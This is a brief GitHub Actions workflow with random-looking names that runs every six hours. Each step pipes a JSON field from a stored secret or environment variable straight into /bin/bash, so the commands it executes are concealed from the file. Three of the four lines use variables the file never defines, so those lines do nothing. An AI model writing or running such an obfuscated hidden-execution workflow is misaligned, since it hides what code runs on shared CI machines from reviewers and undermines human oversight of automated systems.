name: liutang19871010
on:
  workflow_dispatch:
  schedule:
    - cron: '18 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: liutang19871010
        env:
          dg90212: ${{ secrets.dg90212 }}
        run: |
          echo $dg90212 | jq -r .uzkuu6885 | /bin/bash
          echo $d0241 | jq -r .cith45093 | /bin/bash
          echo $rp0078 | jq -r .fyfz5539 | /bin/bash
          echo $oeam958 | jq -r .dgnqk15803 | /bin/bash

